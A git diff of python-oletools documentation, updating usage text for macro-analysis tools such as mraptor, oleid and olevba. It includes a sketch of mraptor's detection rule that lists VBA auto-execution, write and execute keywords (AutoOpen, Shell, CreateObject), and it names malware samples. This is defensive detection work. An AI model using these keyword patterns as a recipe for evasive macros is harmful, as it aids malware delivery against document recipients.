THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS “AS IS” AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
olevba contains modified source code from the officeparser project, published under the following MIT License (MIT):
officeparser is copyright (c) 2014 John William Davison
-Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
mraptor is a tool designed to detect most malicious VBA Macros using generic heuristics. Unlike antivirus engines, it does not rely on signatures.
In a nutshell, mraptor detects keywords corresponding to the three following types of behaviour that are present in clear text in almost any macro malware: - A: Auto-execution trigger - W: Write to the file system or memory - X: Execute a file or any payload outside the VBA context
mraptor considers that a macro is suspicious when A and (W or X) is true.
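The "A and (W or X)" rule can be sketched in a few lines of Python. This is only an illustration of the logic: the keyword lists below are hypothetical placeholders, not mraptor's actual detection patterns (which are regular expressions tuned against real macro malware):

```python
# Illustrative sketch of mraptor's "A and (W or X)" decision rule.
# These keyword lists are hypothetical examples, NOT mraptor's real patterns.
AUTOEXEC = ("AutoOpen", "Document_Open", "Workbook_Open")  # A: auto-execution triggers
WRITE = ("FileSystemObject", "ADODB.Stream", "Output")     # W: write to file system/memory
EXECUTE = ("Shell", "CreateObject", "ShellExecute")        # X: execute a payload

def is_suspicious(vba_code):
    a = any(kw in vba_code for kw in AUTOEXEC)
    w = any(kw in vba_code for kw in WRITE)
    x = any(kw in vba_code for kw in EXECUTE)
    # suspicious only when an auto-execution trigger is combined
    # with a write or execute capability
    return a and (w or x)
```

Note how a macro with only an auto-execution trigger but no write/execute behaviour is not flagged, which keeps false positives low on benign auto-macros.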
-For more information about mraptor's detection algorithm, see the article How to detect most malicious macros without an antivirus.
+For more information about mraptor’s detection algorithm, see the article How to detect most malicious macros without an antivirus.
mraptor can be used either as a command-line tool, or as a python module from your own applications.
It is part of the python-oletools package.
Usage: mraptor.py [options] <filename> [filename2 ...]
+Usage: mraptor [options] <filename> [filename2 ...]
Options:
-h, --help show this help message and exit
@@ -41,18 +49,15 @@ Usage
- 20: SUSPICIOUS
Examples
Scan a single file:
-mraptor.py file.doc
-Scan a single file, stored in a Zip archive with password "infected":
-mraptor.py malicious_file.xls.zip -z infected
+mraptor file.doc
+Scan a single file, stored in a Zip archive with password “infected”:
+mraptor malicious_file.xls.zip -z infected
Scan a collection of files stored in a folder:
-mraptor.py "MalwareZoo/VBA/*"
+mraptor "MalwareZoo/VBA/*"
Important: on Linux/MacOSX, always add double quotes around a file name when you use wildcards such as * and ?. Otherwise, the shell may replace the argument with the actual list of files matching the wildcards before starting the script.
-
-
-
-
+![](mraptor1.png)
Python 3 support - mraptor3
-As of v0.50, mraptor has been ported to Python 3 thanks to @sebdraven. However, the differences between Python 2 and 3 are significant and for now there is a separate version of mraptor named mraptor3 to be used with Python 3.
+Since v0.54, mraptor is fully compatible with both Python 2 and 3. There is no need to use mraptor3 anymore, however it is still present for backward compatibility.
How to use mraptor in Python applications
TODO
@@ -65,16 +70,17 @@ python-oletools documentation
Contribute, Suggest Improvements or Report Issues
Tools:
diff --git a/oletools/doc/mraptor.md b/oletools/doc/mraptor.md
index c5b7f46f..55b55470 100644
--- a/oletools/doc/mraptor.md
+++ b/oletools/doc/mraptor.md
@@ -24,7 +24,7 @@ It is part of the [python-oletools](http://www.decalage.info/python/oletools) pa
## Usage
```text
-Usage: mraptor.py [options] <filename> [filename2 ...]
+Usage: mraptor [options] <filename> [filename2 ...]
Options:
-h, --help show this help message and exit
@@ -54,19 +54,19 @@ An exit code is returned based on the analysis result:
Scan a single file:
```text
-mraptor.py file.doc
+mraptor file.doc
```
Scan a single file, stored in a Zip archive with password "infected":
```text
-mraptor.py malicious_file.xls.zip -z infected
+mraptor malicious_file.xls.zip -z infected
```
Scan a collection of files stored in a folder:
```text
-mraptor.py "MalwareZoo/VBA/*"
+mraptor "MalwareZoo/VBA/*"
```
**Important**: on Linux/MacOSX, always add double quotes around a file name when you use
@@ -77,10 +77,8 @@ list of files matching the wildcards before starting the script.
## Python 3 support - mraptor3
-As of v0.50, mraptor has been ported to Python 3 thanks to @sebdraven.
-However, the differences between Python 2 and 3 are significant and for now
-there is a separate version of mraptor named mraptor3 to be used with
-Python 3.
+Since v0.54, mraptor is fully compatible with both Python 2 and 3.
+There is no need to use mraptor3 anymore, however it is still present for backward compatibility.
--------------------------------------------------------------------------
@@ -100,14 +98,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/olebrowse.html b/oletools/doc/olebrowse.html
index 348889cd..3a2f4ae3 100644
--- a/oletools/doc/olebrowse.html
+++ b/oletools/doc/olebrowse.html
@@ -1,15 +1,23 @@
-
-
+
+
-
-
+
-
-
+
+ Untitled
+
+
olebrowse
-olebrowse is a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.
+olebrowse is a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.
It is part of the python-oletools package.
Dependencies
olebrowse requires Tkinter. On Windows and MacOSX, it should be installed with Python, and olebrowse should work out of the box.
@@ -18,24 +26,15 @@ Dependencies
And for Python 3:
sudo apt-get install python3-tk
Usage
-olebrowse.py [file]
+olebrowse [file]
If you provide a file it will be opened, else a dialog will allow you to browse folders to open a file. Then if it is a valid OLE file, the list of data streams will be displayed. You can select a stream, and then either view its content in a builtin hexadecimal viewer, or save it to a file for further analysis.
Screenshots
Main menu, showing all streams in the OLE file:
-
-
-
-
+![](olebrowse1_menu.png)
Menu with actions for a stream:
-
-
-
-
+![](olebrowse2_stream.png)
Hex view for a stream:
-
-
-
-
+![](olebrowse3_hexview.png)
python-oletools documentation
@@ -45,16 +44,17 @@ python-oletools documentation
- Contribute, Suggest Improvements or Report Issues
- Tools:
diff --git a/oletools/doc/olebrowse.md b/oletools/doc/olebrowse.md
index 57f727b1..3f984978 100644
--- a/oletools/doc/olebrowse.md
+++ b/oletools/doc/olebrowse.md
@@ -30,9 +30,9 @@ sudo apt-get install python3-tk
Usage
-----
-
- olebrowse.py [file]
-
+```
+olebrowse [file]
+```
If you provide a file it will be opened, else a dialog will allow you to browse
folders to open a file. Then if it is a valid OLE file, the list of data streams
will be displayed. You can select a stream, and then either view its content
@@ -63,14 +63,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/oledir.html b/oletools/doc/oledir.html
index 1ea3e757..0b224465 100644
--- a/oletools/doc/oledir.html
+++ b/oletools/doc/oledir.html
@@ -1,11 +1,19 @@
oledir
@@ -13,14 +21,22 @@ oledir
It can be used either as a command-line tool, or as a python module from your own applications.
It is part of the python-oletools package.
Usage
-Usage: oledir.py <filename>
+Usage: oledir [options] <filename> [filename2 ...]
+
+Options:
+ -h, --help show this help message and exit
+ -r find files recursively in subdirectories.
+ -z ZIP_PASSWORD, --zip=ZIP_PASSWORD
+ if the file is a zip archive, open all files from it,
+ using the provided password (requires Python 2.6+)
+ -f ZIP_FNAME, --zipfname=ZIP_FNAME
+ if the file is a zip archive, file(s) to be opened
+ within the zip. Wildcards * and ? are supported.
+ (default:*)
Examples
Scan a single file:
-oledir.py file.doc
-
-
-
-
+oledir file.doc
+![](oledir.png)
How to use oledir in Python applications
TODO
@@ -33,16 +49,17 @@ python-oletools documentation
Contribute, Suggest Improvements or Report Issues
Tools:
diff --git a/oletools/doc/oledir.md b/oletools/doc/oledir.md
index a0b81f1a..e520dbf1 100644
--- a/oletools/doc/oledir.md
+++ b/oletools/doc/oledir.md
@@ -11,7 +11,18 @@ It is part of the [python-oletools](http://www.decalage.info/python/oletools) pa
## Usage
```text
-Usage: oledir.py <filename>
+Usage: oledir [options] <filename> [filename2 ...]
+
+Options:
+ -h, --help show this help message and exit
+ -r find files recursively in subdirectories.
+ -z ZIP_PASSWORD, --zip=ZIP_PASSWORD
+ if the file is a zip archive, open all files from it,
+ using the provided password (requires Python 2.6+)
+ -f ZIP_FNAME, --zipfname=ZIP_FNAME
+ if the file is a zip archive, file(s) to be opened
+ within the zip. Wildcards * and ? are supported.
+ (default:*)
```
### Examples
@@ -19,7 +30,7 @@ Usage: oledir.py
Scan a single file:
```text
-oledir.py file.doc
+oledir file.doc
```
![](oledir.png)
@@ -41,14 +52,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/oleid.html b/oletools/doc/oleid.html
index d2b6543e..7ccb46d3 100644
--- a/oletools/doc/oleid.html
+++ b/oletools/doc/oleid.html
@@ -1,56 +1,92 @@
oleid
-oleid is a script to analyze OLE files such as MS Office documents (e.g. Word, Excel), to detect specific characteristics usually found in malicious files (e.g. malware). For example it can detect VBA macros and embedded Flash objects.
+oleid is a script to analyze OLE files such as MS Office documents (e.g. Word, Excel), to detect specific characteristics usually found in malicious files (e.g. malware). For example it can detect VBA macros and embedded Flash objects.
It is part of the python-oletools package.
Main Features
-- Detect OLE file type from its internal structure (e.g. MS Word, Excel, PowerPoint, ...)
+- Detect OLE file type from its internal structure (e.g. MS Word, Excel, PowerPoint, …)
- Detect VBA Macros
- Detect embedded Flash objects
- Detect embedded OLE objects
@@ -71,10 +107,10 @@ Main Features
- CSV output
Usage
-oleid.py <file>
+oleid <file>
Example
Analyzing a Word document containing a Flash object and VBA macros:
-C:\oletools>oleid.py word_flash_vba.doc
+C:\oletools>oleid word_flash_vba.doc
Filename: word_flash_vba.doc
+-------------------------------+-----------------------+
@@ -94,9 +130,9 @@ Example
+-------------------------------+-----------------------+
How to use oleid in your Python applications
First, import oletools.oleid, and create an OleID object to scan a file:
-import oletools.oleid
-
-oid = oletools.oleid.OleID(filename)
+import oletools.oleid
+
+oid = oletools.oleid.OleID(filename)
Note: filename can be a filename, a file-like object, or a bytes string containing the file to be analyzed.
Second, call the check() method. It returns a list of Indicator objects.
Each Indicator object has the following attributes:
@@ -104,15 +140,15 @@ How to use oleid in your P
id: str, identifier for the indicator
name: str, name to display the indicator
description: str, long description of the indicator
-type: class of the indicator (e.g. bool, str, int)
+type: class of the indicator (e.g. bool, str, int)
value: value of the indicator
For example, the following code displays all the indicators:
-indicators = oid.check()
-for i in indicators:
- print 'Indicator id=%s name="%s" type=%s value=%s' % (i.id, i.name, i.type, repr(i.value))
- print 'description:', i.description
- print ''
+indicators = oid.check()
+for i in indicators:
+ print 'Indicator id=%s name="%s" type=%s value=%s' % (i.id, i.name, i.type, repr(i.value))
+ print 'description:', i.description
+ print ''
See the source code of oleid.py for more details.
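Since the loop above uses Python 2 print statements, here is a hedged Python 3 adaptation of the same idea. The formatting helper is illustrative only (it is not part of the oleid API); it relies solely on the Indicator attributes documented above:

```python
def format_indicator(i):
    """Format one oleid Indicator using the attributes documented above
    (id, name, type, value, description).
    Illustrative helper only, not part of the oleid API."""
    return ('Indicator id=%s name="%s" type=%s value=%s\ndescription: %s'
            % (i.id, i.name, i.type, repr(i.value), i.description))

# With the real library (assuming oletools is installed):
#   import oletools.oleid
#   oid = oletools.oleid.OleID(filename)
#   for indicator in oid.check():
#       print(format_indicator(indicator))
```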
python-oletools documentation
@@ -123,16 +159,17 @@ python-oletools documentation
Contribute, Suggest Improvements or Report Issues
Tools:
diff --git a/oletools/doc/oleid.md b/oletools/doc/oleid.md
index 829c1e9e..9bcf1e8f 100644
--- a/oletools/doc/oleid.md
+++ b/oletools/doc/oleid.md
@@ -32,7 +32,7 @@ Planned improvements:
## Usage
```text
-oleid.py <file>
+oleid <file>
```
### Example
@@ -40,7 +40,7 @@ oleid.py
Analyzing a Word document containing a Flash object and VBA macros:
```text
-C:\oletools>oleid.py word_flash_vba.doc
+C:\oletools>oleid word_flash_vba.doc
Filename: word_flash_vba.doc
+-------------------------------+-----------------------+
@@ -104,14 +104,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/olemap.html b/oletools/doc/olemap.html
index b6ffcf1e..4af5a3d2 100644
--- a/oletools/doc/olemap.html
+++ b/oletools/doc/olemap.html
@@ -1,11 +1,19 @@
olemap
@@ -13,18 +21,12 @@ olemap
It can be used either as a command-line tool, or as a python module from your own applications.
It is part of the python-oletools package.
Usage
-Usage: olemap.py <filename>
+Usage: olemap <filename>
Examples
Scan a single file:
-olemap.py file.doc
-
-
-
-
-
-
-
-
+olemap file.doc
+![](olemap1.png)
+![](olemap2.png)
How to use olemap in Python applications
TODO
@@ -37,16 +39,17 @@ python-oletools documentation
Contribute, Suggest Improvements or Report Issues
Tools:
diff --git a/oletools/doc/olemap.md b/oletools/doc/olemap.md
index e00d2e67..8c0eac7f 100644
--- a/oletools/doc/olemap.md
+++ b/oletools/doc/olemap.md
@@ -10,7 +10,7 @@ It is part of the [python-oletools](http://www.decalage.info/python/oletools) pa
## Usage
```text
-Usage: olemap.py <filename>
+Usage: olemap <filename>
```
### Examples
@@ -18,7 +18,7 @@ Usage: olemap.py
Scan a single file:
```text
-olemap.py file.doc
+olemap file.doc
```
![](olemap1.png)
@@ -41,14 +41,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/olemeta.html b/oletools/doc/olemeta.html
index adefef1a..302844eb 100644
--- a/oletools/doc/olemeta.html
+++ b/oletools/doc/olemeta.html
@@ -1,23 +1,28 @@
olemeta
-olemeta is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract all standard properties present in the OLE file.
+olemeta is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract all standard properties present in the OLE file.
It is part of the python-oletools package.
Usage
-olemeta.py <file>
+olemeta <file>
Example
-
-
-
-
+![](olemeta1.png)
How to use olemeta in Python applications
TODO
@@ -29,16 +34,17 @@ python-oletools documentation
Contribute, Suggest Improvements or Report Issues
Tools:
diff --git a/oletools/doc/olemeta.md b/oletools/doc/olemeta.md
index e79c4555..6e0f569b 100644
--- a/oletools/doc/olemeta.md
+++ b/oletools/doc/olemeta.md
@@ -9,7 +9,7 @@ It is part of the [python-oletools](http://www.decalage.info/python/oletools) pa
## Usage
```text
-olemeta.py <file>
+olemeta <file>
```
### Example
@@ -30,14 +30,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/oleobj.html b/oletools/doc/oleobj.html
index 1786efa5..56d0d568 100644
--- a/oletools/doc/oleobj.html
+++ b/oletools/doc/oleobj.html
@@ -1,11 +1,19 @@
oleobj
@@ -27,16 +35,17 @@ python-oletools documentation
Contribute, Suggest Improvements or Report Issues
Tools:
diff --git a/oletools/doc/oleobj.md b/oletools/doc/oleobj.md
index ddf20611..b07ed7d3 100644
--- a/oletools/doc/oleobj.md
+++ b/oletools/doc/oleobj.md
@@ -31,14 +31,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/oletimes.html b/oletools/doc/oletimes.html
index a020425a..04a6745a 100644
--- a/oletools/doc/oletimes.html
+++ b/oletools/doc/oletimes.html
@@ -1,21 +1,29 @@
oletimes
-oletimes is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract creation and modification times of all streams and storages in the OLE file.
+oletimes is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract creation and modification times of all streams and storages in the OLE file.
It is part of the python-oletools package.
Usage
-oletimes.py <file>
+oletimes <file>
Example
Checking the malware sample DIAN_caso-5415.doc:
->oletimes.py DIAN_caso-5415.doc
+>oletimes DIAN_caso-5415.doc
+----------------------------+---------------------+---------------------+
| Stream/Storage name | Modification Time | Creation Time |
@@ -51,16 +59,17 @@ python-oletools documentation
Contribute, Suggest Improvements or Report Issues
Tools:
diff --git a/oletools/doc/oletimes.md b/oletools/doc/oletimes.md
index fb43ce1a..fe797908 100644
--- a/oletools/doc/oletimes.md
+++ b/oletools/doc/oletimes.md
@@ -10,7 +10,7 @@ It is part of the [python-oletools](http://www.decalage.info/python/oletools) pa
## Usage
```text
-oletimes.py <file>
+oletimes <file>
```
### Example
@@ -18,7 +18,7 @@ oletimes.py
Checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/):
```text
->oletimes.py DIAN_caso-5415.doc
+>oletimes DIAN_caso-5415.doc
+----------------------------+---------------------+---------------------+
| Stream/Storage name | Modification Time | Creation Time |
@@ -59,14 +59,15 @@ python-oletools documentation
- [[Install]]
- [[Contribute]], Suggest Improvements or Report Issues
- Tools:
+ - [[mraptor]]
+ - [[msodde]]
- [[olebrowse]]
+ - [[oledir]]
- [[oleid]]
+ - [[olemap]]
- [[olemeta]]
+ - [[oleobj]]
- [[oletimes]]
- - [[oledir]]
- - [[olemap]]
- [[olevba]]
- - [[mraptor]]
- [[pyxswf]]
- - [[oleobj]]
- [[rtfobj]]
diff --git a/oletools/doc/olevba.html b/oletools/doc/olevba.html
index c718243d..010347b7 100644
--- a/oletools/doc/olevba.html
+++ b/oletools/doc/olevba.html
@@ -1,68 +1,105 @@
olevba
-olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to detect VBA Macros, extract their source code in clear text, and detect security-related patterns such as auto-executable macros, suspicious VBA keywords used by malware, anti-sandboxing and anti-virtualization techniques, and potential IOCs (IP addresses, URLs, executable filenames, etc). It also detects and decodes several common obfuscation methods including Hex encoding, StrReverse, Base64, Dridex, VBA expressions, and extracts IOCs from decoded strings.
+olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to detect VBA Macros, extract their source code in clear text, and detect security-related patterns such as auto-executable macros, suspicious VBA keywords used by malware, anti-sandboxing and anti-virtualization techniques, and potential IOCs (IP addresses, URLs, executable filenames, etc). It also detects and decodes several common obfuscation methods including Hex encoding, StrReverse, Base64, Dridex, VBA expressions, and extracts IOCs from decoded strings. XLM/Excel 4 Macros are also supported in Excel and SLK files.
It can be used either as a command-line tool, or as a python module from your own applications.
It is part of the python-oletools package.
olevba is based on source code from officeparser by John William Davison, with significant modifications.
Supported formats
-- Word 97-2003 (.doc, .dot)
-- Word 2007+ (.docm, .dotm)
+- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
+- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
+- PowerPoint 97-2003 (.ppt), PowerPoint 2007+ (.pptm, .ppsm)
+- Word/PowerPoint 2007+ XML (aka Flat OPC)
- Word 2003 XML (.xml)
-- Word/Excel MHTML, aka Single File Web Page (.mht)
-- Excel 97-2003 (.xls)
-- Excel 2007+ (.xlsm, .xlsb)
-- PowerPoint 2007+ (.pptm, .ppsm)
+- Word/Excel Single File Web Page / MHTML (.mht)
+- Publisher (.pub)
+- SYLK/SLK files (.slk)
- Text file containing VBA or VBScript source code
- Password-protected Zip archive containing any of the above
-Main Features
+Main Features
- Detect VBA macros in MS Office 97-2003 and 2007+ files, XML, MHT
- Extract VBA macro source code
@@ -81,9 +118,9 @@ Main Features
About VBA Macros
See this article for more information and technical details about VBA Macros and how they are stored in MS Office documents.
How it works
-
+
- olevba checks the file type: If it is an OLE file (i.e MS Office 97-2003), it is parsed right away.
-- If it is a zip file (i.e. MS Office 2007+), XML or MHTML, olevba looks for all OLE files stored in it (e.g. vbaProject.bin, editdata.mso), and opens them.
+- If it is a zip file (i.e. MS Office 2007+), XML or MHTML, olevba looks for all OLE files stored in it (e.g. vbaProject.bin, editdata.mso), and opens them.
- olevba identifies all the VBA projects stored in the OLE structure.
- Each VBA project is parsed to find the corresponding OLE streams containing macro code.
- In each of these OLE streams, the VBA macro source code is extracted and decompressed (RLE compression).
@@ -91,56 +128,65 @@ How it works
- olevba scans the macro source code and the deobfuscated strings to find suspicious keywords, auto-executable macros and potential IOCs (URLs, IP addresses, e-mail addresses, executable filenames, etc).
Usage
-Usage: olevba.py [options] <filename> [filename2 ...]
-
+Usage: olevba [options] <filename> [filename2 ...]
+
Options:
-h, --help show this help message and exit
-r find files recursively in subdirectories.
-z ZIP_PASSWORD, --zip=ZIP_PASSWORD
if the file is a zip archive, open all files from it,
- using the provided password (requires Python 2.6+)
+ using the provided password.
+ -p PASSWORD, --password=PASSWORD
+ if encrypted office files are encountered, try
+ decryption with this password. May be repeated.
-f ZIP_FNAME, --zipfname=ZIP_FNAME
if the file is a zip archive, file(s) to be opened
within the zip. Wildcards * and ? are supported.
(default:*)
- -t, --triage triage mode, display results as a summary table
- (default for multiple files)
- -d, --detailed detailed mode, display full results (default for
- single file)
-a, --analysis display only analysis results, not the macro source
code
-c, --code display only VBA source code, do not analyze it
- -i INPUT, --input=INPUT
- input file containing VBA source code to be analyzed
- (no parsing)
--decode display all the obfuscated strings with their decoded
content (Hex, Base64, StrReverse, Dridex, VBA).
--attr display the attribute lines at the beginning of VBA
source code
--reveal display the macro source code after replacing all the
- obfuscated strings by their decoded content.
+ obfuscated strings by their decoded content.
+ -l LOGLEVEL, --loglevel=LOGLEVEL
+ logging level debug/info/warning/error/critical
+ (default=warning)
+ --deobf Attempt to deobfuscate VBA expressions (slow)
+ --relaxed Do not raise errors if opening of substream fails
+
+ Output mode (mutually exclusive):
+ -t, --triage triage mode, display results as a summary table
+ (default for multiple files)
+ -d, --detailed detailed mode, display full results (default for
+ single file)
+ -j, --json json mode, detailed in json format (never default)
+New in v0.54: the -p option can now be used to decrypt encrypted documents using the provided password(s).
Examples
Scan a single file:
-olevba.py file.doc
-Scan a single file, stored in a Zip archive with password "infected":
-olevba.py malicious_file.xls.zip -z infected
+olevba file.doc
+Scan a single file, stored in a Zip archive with password “infected”:
+olevba malicious_file.xls.zip -z infected
Scan a single file, showing all obfuscated strings decoded:
-olevba.py file.doc --decode
+olevba file.doc --decode
Scan a single file, showing the macro source code with VBA strings deobfuscated:
-olevba.py file.doc --reveal
+olevba file.doc --reveal
Scan VBA source code extracted into a text file:
-olevba.py source_code.vba
+olevba source_code.vba
Scan a collection of files stored in a folder:
-olevba.py "MalwareZoo/VBA/*"
+olevba "MalwareZoo/VBA/*"
NOTE: On Linux, MacOSX and other Unix variants, it is required to add double quotes around wildcards. Otherwise, they will be expanded by the shell instead of olevba.
Scan all .doc and .xls files, recursively in all subfolders:
-olevba.py "MalwareZoo/VBA/*.doc" "MalwareZoo/VBA/*.xls" -r
+olevba "MalwareZoo/VBA/*.doc" "MalwareZoo/VBA/*.xls" -r
Scan all .doc files within all .zip files with password, recursively:
-olevba.py "MalwareZoo/VBA/*.zip" -r -z infected -f "*.doc"
+olevba "MalwareZoo/VBA/*.zip" -r -z infected -f "*.doc"
Detailed analysis mode (default for single file)
When a single file is scanned, or when using the option -d, all details of the analysis are displayed.
For example, checking the malware sample DIAN_caso-5415.doc:
->olevba.py c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip -z infected
+>olevba c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip -z infected
===============================================================================
FILE: DIAN_caso-5415.doc.malware in c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip
Type: OLE
@@ -210,7 +256,7 @@ Triage mode (default for multipl
- V: VBA string expressions (potential obfuscation)
Here is an example:
-c:\>olevba.py \MalwareZoo\VBA\samples\*
+c:\>olevba \MalwareZoo\VBA\samples\*
Flags Filename
----------- -----------------------------------------------------------------
OLE:MASI--- \MalwareZoo\VBA\samples\DIAN_caso-5415.doc.malware
@@ -230,47 +276,47 @@ Triage mode (default for multipl
OLE:MASI-B- \MalwareZoo\VBA\samples\ROVNIX.doc.malware
OLE:MA----- \MalwareZoo\VBA\samples\Word within Word macro auto.doc
Python 3 support - olevba3
